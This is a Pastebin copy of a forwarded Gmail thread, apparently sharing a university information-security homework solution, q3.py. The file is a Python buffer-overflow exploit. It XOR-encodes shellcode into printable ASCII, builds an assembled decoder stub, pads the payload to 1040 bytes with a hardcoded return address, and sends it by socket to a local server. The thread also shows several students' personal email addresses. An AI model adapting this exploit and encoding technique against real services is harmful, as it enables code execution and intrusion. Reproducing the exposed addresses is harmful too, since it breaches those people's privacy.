Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Conversation opened. 4 messages. All messages read.
- Skip to content
- Using Gmail with screen readers
- 19 of 1,941
- Fwd: infosec 5 complete
- Inbox
- x
- Guy Pinchuk
- AttachmentsSun, Apr 7, 12:09 PM (6 days ago)
- ---------- Forwarded message ---------- From: Oz Ben Simhon <oz.b.simhon@gmail.com> Date: 6 Apr 2019, 22:08 +0300 To: guypinchuk@gmail.com Subject: Fwd: infosec
- eranchriqui
- AttachmentsSun, Apr 7, 12:12 PM (6 days ago)
- ---------- Forwarded message --------- From: Guy Pinchuk <guypinchuk@gmail.com> Date: Sun, 7 Apr 2019 at 12:09 Subject: Fwd: infosec 5 complete To: <eranchriqui
- eranchriqui
- AttachmentsTue, Apr 9, 7:50 PM (4 days ago)
- ---------- Forwarded message --------- From: eranchriqui <eranchriqui@gmail.com> Date: Sun, 7 Apr 2019 at 12:12 Subject: Fwd: infosec 5 complete To: itaizur@mai
- eranchriqui <eranchriqui@gmail.com>
- Attachments
- Tue, Apr 9, 8:04 PM (4 days ago)
- to altmark@mail.tau.ac.il
- 7 Attachments
- #!/usr/bin/python
- import functools, os, socket, traceback, assemble, struct
- import q2
- HOST = '127.0.0.1'
- SERVER_PORT = 8000
- LOCAL_PORT = 1337
- ASCII_MAX = 0x7f
- def warn_invalid_ascii(selector=None):
- selector = selector or (lambda x: x)
- def decorator(func):
- @functools.wraps(func)
- def result(*args, **kwargs):
- ret = func(*args, **kwargs)
- i = 0
- for c in selector(ret):
- i+=1
- if ord(c) > ASCII_MAX:
- print(str(ord(c))+" at position " + str(i))
- if any(ord(c) > ASCII_MAX for c in selector(ret)):
- print('WARNING: Non ASCII chars in return value from %s at\n%s'
- % (func.__name__, ''.join(traceback.format_stack()[:-1])))
- return ret
- return result
- return decorator
- def get_raw_shellcode():
- return q2.get_shellcode()
- @warn_invalid_ascii(lambda (x,y): x)
- def encode(data):
- shellcode = list(data)
- indices_array = []
- for i in range(len(shellcode)):
- byte_value = ord(shellcode[i])
- if( byte_value > 0x7f ):
- indices_array.append(i)
- shellcode[i] = chr(byte_value^0xff)
- return "".join(shellcode),indices_array
- @warn_invalid_ascii()
- def get_decoder(indices):
- command_array = []
- #set BL to 0xff under opcode ascii boundry
- set_BL_ff_command = assemble.assemble_data("PUSH 0 ;POP EBX ;DEC EBX ;")
- command_array.append(set_BL_ff_command)
- # Small Hack :) I forced a valid opcode for 'ADD EAX, 127 ;'
- add_127_command = '\x05\x7f\x00\x00\x00'
- acc_127 = 0
- for i in indices:
- while (i-acc_127) > 127:
- acc_127+=127
- command_array.append(add_127_command)
- curent_command = assemble.assemble_data("XOR byte ptr [EAX+"+ str(i-acc_127) +"], BL; ")
- command_array.append(curent_command)
- return ''.join(command_array)
- @warn_invalid_ascii()
- def get_shellcode():
- q2_shellcode = get_raw_shellcode()
- encoded_sheelcode, indices_array = encode(q2_shellcode)
- decoder_code = get_decoder(indices_array)
- # the +4 is because we already poped the caller returned address, so esp is 4 bytes behind.
- # Regarding "DEC EAX ;"*(len(q2_shellcode)+4), This is poor solution! but I decided not to waist more time on finding valid ascii opcode
- load_eax = "PUSH ESP ;POP EAX ;"+" DEC EAX ;"*(len(q2_shellcode)+4)
- assembled_load_eax = assemble.assemble_data(load_eax)
- return assembled_load_eax+decoder_code+encoded_sheelcode
- @warn_invalid_ascii(lambda x: x[4:-5])
- def get_payload():
- shellcode = get_shellcode()
- return_address = network_order_uint32(0xbfffdddc, False)
- # we cant pad with nop because of ascii limit,
- # padding with inc aex until shellcode len will reach 1040,
- # I can 'inc eax' becase first command in my shell code is 'mov eax, esp'
- message = shellcode.rjust(1040,'\x41')+return_address
- return network_order_uint32(len(message),True) + message
- def network_order_uint32(value,little):
- if little:
- return struct.pack('>L', value)
- else:
- return struct.pack('<I', value)
- def main():
- payload = get_payload()
- conn = socket.socket()
- conn.connect((HOST, SERVER_PORT))
- try:
- conn.sendall(payload)
- finally:
- conn.close()
- if __name__ == '__main__':
- main()
- q3.py
- Zoomed into item.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement